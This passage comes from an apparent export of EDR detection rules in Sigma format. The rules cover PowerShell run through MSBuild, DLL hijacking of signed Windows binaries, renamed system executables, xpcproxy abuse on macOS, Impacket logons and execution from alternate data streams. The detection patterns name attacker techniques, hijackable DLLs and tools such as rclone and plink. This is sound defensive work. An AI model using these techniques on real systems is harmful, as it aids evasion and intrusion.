classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n ProcessOriginalFileName: 'MSBuild.exe'\n condition: selection\nfalsepositives:\n - Legitimate developers including PowerShell scripts into their builds.\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5258ce45-d23f-411e-8ffe-675a220f6420",
"rule_name": "PowerShell Script Executed via MSBuild",
"rule_description": "Detects a PowerShell script execution by the MSBuild process.\nAttackers often deliver PowerShell scripts as uncompiled code, and in order to hide the powershell.exe process, compile them directly on the victim's machine.\nThis can be indicative of a PowerShell-less attack such as PowerLessShell or through frameworks such as Empire.\nIt is recommended to analyze the executed PowerShell script for malicious content.\n",
"rule_creation_date": "2023-04-03",
"rule_modified_date": "2025-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1027.004",
"attack.t1036",
"attack.t1059.001",
"attack.t1127.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "525b00f7-a2d5-466c-844d-35b6441c01c7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082009Z",
"creation_date": "2026-03-23T11:45:34.082011Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082015Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dpapimig.yml",
"content": "title: DLL Hijacking via dpapimig.exe\nid: 525b00f7-a2d5-466c-844d-35b6441c01c7\ndescription: |\n Detects potential Windows DLL Hijacking via dpapimig.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dpapimig.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\SAMLIB.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "525b00f7-a2d5-466c-844d-35b6441c01c7",
"rule_name": "DLL Hijacking via dpapimig.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dpapimig.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "52676a08-8666-444d-83c4-cd0d831e19b0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624967Z",
"creation_date": "2026-03-23T11:45:34.624969Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624974Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1036/003/"
],
"name": "t1036_003_renamed_suspicious_executables.yml",
"content": "title: Suspicious Renamed Binary Executed\nid: 52676a08-8666-444d-83c4-cd0d831e19b0\ndescription: |\n Detects the execution of a suspicious renamed binary.\n Attackers may rename legitimate Microsoft binaries to avoid detection.\n This rule detects incoherency between the name of the file being executed its PE original file name.\n Is it recommended to analyze the executed binary and search for signs of malicious content or behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1036/003/\ndate: 2020/12/22\nmodified: 2025/12/16\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1036.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_powershell:\n OriginalFileName: 'PowerShell.EXE'\n filter_powershell:\n Image|endswith: '\\powershell.exe'\n selection_cmd:\n OriginalFileName: 'Cmd.Exe'\n filter_cmd:\n Image|endswith: '\\cmd.exe'\n selection_mshta:\n OriginalFileName: 'MSHTA.EXE'\n filter_mshta:\n Image|endswith: '\\mshta.exe'\n selection_cscript:\n OriginalFileName: 'cscript.exe'\n filter_cscript:\n Image|endswith: '\\cscript.exe'\n selection_wscript:\n OriginalFileName: 'wscript.exe'\n filter_wscript:\n Image|endswith: '\\wscript.exe'\n selection_certutil:\n OriginalFileName: 'certutil.exe'\n filter_certutil:\n Image|endswith: '\\certutil.exe'\n selection_tzsync:\n OriginalFileName: 'tzsync.exe'\n filter_tzsync:\n Image|endswith: '\\tzsync.exe'\n selection_taskhost:\n OriginalFileName: 'taskhost.exe'\n filter_taskhost:\n Image|endswith: '\\taskhost.exe'\n selection_rundll:\n OriginalFileName: 'RUNDLL32.EXE'\n filter_rundll:\n Image|endswith: '\\rundll32.exe'\n selection_svchost:\n OriginalFileName: 'svchost.exe'\n filter_svchost:\n Image|endswith: '\\svchost.exe'\n selection_dllhost:\n OriginalFileName: 'dllhost.exe'\n filter_dllhost:\n Image|endswith: '\\dllhost.exe'\n selection_msiexec:\n OriginalFileName: 'msiexec.exe'\n filter_msiexec:\n Image|endswith: '\\msiexec.exe'\n selection_csrss:\n OriginalFileName: 'CSRSS.Exe'\n filter_csrss:\n Image|endswith: '\\csrss.exe'\n selection_winlogon:\n OriginalFileName: 'WINLOGON.EXE'\n filter_winlogon:\n - Image|endswith: '\\winlogon.exe'\n - InternalName: 'WinlogonGUILauncher.exe'\n selection_wininit:\n OriginalFileName: 'WinInit.EXE'\n filter_wininit:\n Image|endswith: '\\wininit.exe'\n selection_werfault:\n OriginalFileName: 'WerFault.EXE'\n filter_werfault:\n Image|endswith: '\\WerFault.exe'\n selection_schtasks:\n OriginalFileName:\n # Windows 7 variant with typo.\n - 'sctasks.exe'\n - 'schtasks.exe'\n filter_schtasks:\n Image|endswith: '\\schtasks.exe'\n selection_installutil:\n OriginalFileName: 'InstallUtil.exe'\n filter_installutil:\n Image|endswith: '\\InstallUtil.exe'\n selection_rclone:\n OriginalFileName: 'rclone.exe'\n filter_rclone:\n Image|endswith: '\\rclone.exe'\n selection_plink:\n OriginalFileName: 'Plink'\n filter_plink:\n Image|endswith: '\\plink.exe'\n selection_conhost:\n OriginalFileName: 'conhost.exe'\n filter_conhost:\n Image|endswith: '\\conhost.exe'\n selection_msbuild:\n OriginalFileName: 'MSBuild.exe'\n filter_msbuild:\n Image|endswith: '\\msbuild.exe'\n selection_utilman:\n OriginalFileName: 'utilman2.exe'\n filter_utilman:\n Image|endswith: '\\utilman.exe'\n selection_regsvr32:\n OriginalFileName: 'regsvr32.exe'\n filter_regsvr32:\n Image|endswith: '\\regsvr32.exe'\n\n exclusion_msiexec:\n - Image:\n - '?:\\Windows\\Installer\\MSI????.tmp'\n - '*\\Appdata\\Local\\Temp\\MSI????.tmp'\n ParentImage:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n - Image|startswith:\n - '?:\\Windows\\Temp\\'\n - '?:\\Windows\\SystemTemp\\'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\'\n OriginalFileName: 'msiexec.exe'\n CommandLine|contains: ' /X {????????-????-????-????-????????????}'\n\n exclusion_pending_delete:\n # c:\\windows\\winsxs\\temp\\pendingdeletes\\$$deleteme.svchost.exe.01d84a7f1118b17d.0040\n Image: '?:\\windows\\winsxs\\temp\\pendingdeletes\\\\??deleteme.*.exe.*'\n\n exclusion_asus_svchost:\n # bf7c5a8346f03d923aac78f262dbf456f15810e990c4b5fee0010d81741f6029\n Image: '?:\\Windows\\SysWOW64\\AsHookDevice.exe'\n ProcessSignature: 'ASUSTeK Computer Inc.'\n\n exclusion_siemens:\n CommandLine: '?:\\Windows\\Installer\\MSI???.tmp /c ?:\\Users\\\\*\\AppData\\Local\\Temp\\{????????-????-????-????-????????????}\\RemoveTBSAPP.bat'\n OriginalFileName: 'cmd.exe'\n\n exclusion_logmenim_plink:\n Image:\n - '?:\\Program Files\\LogMeNim\\LogMeNimSsh.exe'\n - '?:\\Program Files (x86)\\LogMeNim\\LogMeNimSsh.exe'\n ProcessSignature: 'ABTEL SARL'\n\n exclusion_systemcenter:\n ProcessImage: '?:\\program files\\common files\\microsoft system center *\\orchestrator\\extensions\\support\\ssh\\sshclient.exe'\n\n exclusion_total_security:\n ProcessParentImage: '?:\\Program Files (x86)\\360\\Total Security\\safemon\\QHActiveDefense.exe'\n\n exclusion_agfa:\n ProcessParentImage|startswith: '?:\\Program Files (x86)\\Agfa\\'\n ProcessParentDescription: 'Qdoc France'\n ProcessParentCompany: 'Agfa'\n\n exclusion_avaya:\n ProcessImage: '?:\\Program Files (x86)\\Avaya\\CMS Supervisor *\\acs_ssh.exe'\n ProcessParentImage: '?:\\Program Files (x86)\\Avaya\\CMS Supervisor *\\acsCNTRL.exe'\n\n exclusion_image:\n ProcessImage:\n - '?:\\Program Files\\Ab Initio\\Ab Initio GDE *\\Program Files\\ab_sshplink.exe'\n - '?:\\Program Files (x86)\\Ab Initio\\Ab Initio GDE *\\Program Files\\ab_sshplink.exe'\n - '?:\\Program Files (x86)\\ScriptLogic Corporation\\Security Explorer ?\\regsvr64.exe'\n - '?:\\Program Files (x86)\\Bignox\\BigNoxVM\\RT\\regsvr32_wow64.exe'\n - '?:\\Program Files\\Software Fix\\InstallUtil64.exe' # Lenovo\n - '?:\\Program Files (x86)\\T&D Recorder (*)\\regsvr.exe'\n - '?:\\Program Files\\iMC\\server\\bin\\plink??.exe'\n - '?:\\IMC\\server\\bin\\plink??.exe'\n\n condition: (\n (selection_powershell and not filter_powershell) or\n (selection_cmd and not filter_cmd) or\n (selection_mshta and not filter_mshta) or\n (selection_cscript and not filter_cscript) or\n (selection_wscript and not filter_wscript) or\n (selection_certutil and not filter_certutil) or\n (selection_tzsync and not filter_tzsync) or\n (selection_taskhost and not filter_taskhost) or\n (selection_rundll and not filter_rundll) or\n (selection_svchost and not filter_svchost) or\n (selection_dllhost and not filter_dllhost) or\n (selection_msiexec and not filter_msiexec) or\n (selection_csrss and not filter_csrss) or\n (selection_winlogon and not filter_winlogon) or\n (selection_wininit and not filter_wininit) or\n (selection_werfault and not filter_werfault) or\n (selection_schtasks and not filter_schtasks) or\n (selection_installutil and not filter_installutil) or\n (selection_rclone and not filter_rclone) or\n (selection_plink and not filter_plink) or\n (selection_conhost and not filter_conhost) or\n (selection_msbuild and not filter_msbuild) or\n (selection_regsvr32 and not filter_regsvr32) or\n (selection_utilman and not filter_utilman)\n ) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "52676a08-8666-444d-83c4-cd0d831e19b0",
"rule_name": "Suspicious Renamed Binary Executed",
"rule_description": "Detects the execution of a suspicious renamed binary.\nAttackers may rename legitimate Microsoft binaries to avoid detection.\nThis rule detects incoherency between the name of the file being executed its PE original file name.\nIs it recommended to analyze the executed binary and search for signs of malicious content or behavior.\n",
"rule_creation_date": "2020-12-22",
"rule_modified_date": "2025-12-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1036.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "526f76da-f806-453c-a9f9-99a8a3dc4103",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598943Z",
"creation_date": "2026-03-23T11:45:34.598947Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598954Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/threat-detection/detecting-cve-2015-1130-on-mac-os-x-endpoints/",
"https://attack.mitre.org/techniques/T1559/003/"
],
"name": "t1059_003_xpcproxy_spawn_process.yml",
"content": "title: Suspicious xpcproxy Execution\nid: 526f76da-f806-453c-a9f9-99a8a3dc4103\ndescription: |\n Detects the execution of the xpcproxy process under suspicious conditions, either by launching a new program or being initiated with an uncommon command-line argument.\n The xpcproxy utility is commonly used in macOS environments to facilitate communication between processes and can be abused to escalate privileges or execute commands with root access.\n Malicious use of xpcproxy may involve it launching unauthorized applications or scripts, or as an exploitation of CVE-2015-1130.\n It is recommended to investigate the program spawned or the actions made by xpcproxy to determine whether this action was legitimate.\nreferences:\n - https://redcanary.com/blog/threat-detection/detecting-cve-2015-1130-on-mac-os-x-endpoints/\n - https://attack.mitre.org/techniques/T1559/003/\ndate: 2024/06/26\nmodified: 2025/10/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1559.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_image:\n - ParentImage: '/usr/libexec/xpcproxy'\n - CommandLine|startswith: 'xpcproxy /'\n\n # Filter-out missing parents\n selection_parent:\n ParentImage|contains: '?'\n\n exclusion_glpi:\n - ProcessImage: '/Applications/GLPI-Agent/bin/perl'\n - ProcessCommandLine:\n - \"sh -c exec security find-certificate -a -p > '/Applications/GLPI-Agent/var/keychain-export-*.pem' 2>/dev/null\"\n - 'security find-certificate -a -p'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "526f76da-f806-453c-a9f9-99a8a3dc4103",
"rule_name": "Suspicious xpcproxy Execution",
"rule_description": "Detects the execution of the xpcproxy process under suspicious conditions, either by launching a new program or being initiated with an uncommon command-line argument.\nThe xpcproxy utility is commonly used in macOS environments to facilitate communication between processes and can be abused to escalate privileges or execute commands with root access.\nMalicious use of xpcproxy may involve it launching unauthorized applications or scripts, or as an exploitation of CVE-2015-1130.\nIt is recommended to investigate the program spawned or the actions made by xpcproxy to determine whether this action was legitimate.\n",
"rule_creation_date": "2024-06-26",
"rule_modified_date": "2025-10-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1559.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "52762d00-7f7d-486e-85ae-511669cb63b0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591475Z",
"creation_date": "2026-03-23T11:45:34.591479Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591487Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_uevappmonitor.yml",
"content": "title: DLL Hijacking via uevappmonitor.exe\nid: 52762d00-7f7d-486e-85ae-511669cb63b0\ndescription: |\n Detects potential Windows DLL Hijacking via uevappmonitor.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'uevappmonitor.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "52762d00-7f7d-486e-85ae-511669cb63b0",
"rule_name": "DLL Hijacking via uevappmonitor.exe",
"rule_description": "Detects potential Windows DLL Hijacking via uevappmonitor.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "52b4f9ce-946f-4f26-affb-866346adb5c0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617892Z",
"creation_date": "2026-03-23T11:45:34.617894Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617898Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/software/S0357/",
"https://attack.mitre.org/techniques/T1078/"
],
"name": "t1078_impacket_authentication.yml",
"content": "title: Impacket NTLM Authentication with NULL Workstation Name Detected\nid: 52b4f9ce-946f-4f26-affb-866346adb5c0\ndescription: |\n Detects a Windows security event log event without a workstation name.\n These events are generated when connecting to a Windows workstation using a NULL workstation name.\n This can be the result of Impacket NTLM Authentication.\n Impacket is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols and is often used by attackers.\n It is recommended to investigate the related timeline, to see if other suspicious actions were taken around the time of this event.\nreferences:\n - https://attack.mitre.org/software/S0357/\n - https://attack.mitre.org/techniques/T1078/\ndate: 2020/01/14\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.discovery\n - attack.t1078\n - attack.s0357\n - classification.Windows.Source.EventLog\n - classification.Windows.HackTool.Impacket\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n service: security\ndetection:\n selection_ntlm:\n #LogonProcessName: 'NtLmSsp' # Investigating name differences between versions\n LogonProcessName: 'EXPERIMENTAL'\n AuthenticationPackageName: 'NTLM'\n LogonType: '3'\n\n selection_workstation:\n Workstation:\n - '-'\n - null\n WorkstationName:\n - '-'\n - null\n\n condition: all of selection_*\nlevel: low\n# level: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "52b4f9ce-946f-4f26-affb-866346adb5c0",
"rule_name": "Impacket NTLM Authentication with NULL Workstation Name Detected",
"rule_description": "Detects a Windows security event log event without a workstation name.\nThese events are generated when connecting to a Windows workstation using a NULL workstation name.\nThis can be the result of Impacket NTLM Authentication.\nImpacket is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols and is often used by attackers.\nIt is recommended to investigate the related timeline, to see if other suspicious actions were taken around the time of this event.\n",
"rule_creation_date": "2020-01-14",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "52d5939f-ceeb-494e-a325-7fa2a6295e74",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087564Z",
"creation_date": "2026-03-23T11:45:34.087566Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087571Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://owasp.org/www-community/attacks/Windows_alternate_data_stream",
"https://lolbas-project.github.io/lolbas/Binaries/Wmic/",
"https://attack.mitre.org/techniques/T1564/004/"
],
"name": "t1564_004_suspicious_execution_from_ads.yml",
"content": "title: Suspicious Process Execution from an ADS\nid: 52d5939f-ceeb-494e-a325-7fa2a6295e74\ndescription: |\n Detects a process execution from an Alternate Data Stream (ADS).\n Attackers can use ADS to hide malicious binaries to evade detection mechanisms.\n It is recommended to investigate the started process for malicious actions.\nreferences:\n - https://owasp.org/www-community/attacks/Windows_alternate_data_stream\n - https://lolbas-project.github.io/lolbas/Binaries/Wmic/\n - https://attack.mitre.org/techniques/T1564/004/\ndate: 2022/10/17\nmodified: 2025/04/24\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessProcessName|contains: ':'\n # Disable rule temporarily\n sha256: '68b36ebc5324a2732edf8121f09754a115e0adc5914eee22eb99f2ebfaeed376'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "52d5939f-ceeb-494e-a325-7fa2a6295e74",
"rule_name": "Suspicious Process Execution from an ADS",
"rule_description": "Detects a process execution from an Alternate Data Stream (ADS).\nAttackers can use ADS to hide malicious binaries to evade detection mechanisms.\nIt is recommended to investigate the started process for malicious actions.\n",
"rule_creation_date": "2022-10-17",
"rule_modified_date": "2025-04-24",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "52fe691a-20e5-47ef-87f1-d8fc6bdef244",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626260Z",
"creation_date": "2026-03-23T11:45:34.626262Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626266Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1539/",
